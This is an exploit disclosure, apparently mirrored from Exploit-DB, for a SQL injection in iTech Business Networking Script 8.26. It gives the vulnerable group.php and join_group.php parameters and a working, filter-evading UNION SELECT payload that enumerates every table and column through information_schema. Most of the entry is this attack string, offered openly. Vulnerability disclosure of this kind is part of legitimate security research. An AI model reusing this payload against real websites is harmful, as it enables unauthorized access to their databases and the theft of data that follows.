iTech Business Networking Script 8.26 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-08-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42506/
  • # # # # #
    # Exploit Title: iTech Business Networking Script 8.26 - SQL Injection
    # Dork: N/A
    # Date: 18.08.2017
    # Vendor Homepage: http://itechscripts.com/
    # Software Link: http://itechscripts.com/business-networking-script/
    # Demo: http://professional-network.itechscripts.com/
    # Version: 8.26
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/group.php?grid=[SQL]
    # -1'+/*!22222union*/+/*!22222select*/+0x31,0x32,0x33,0x34,0x35,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134--+-
    #
    # http://localhost/[PATH]/join_group.php?id=[SQL]
    #
    # # # # #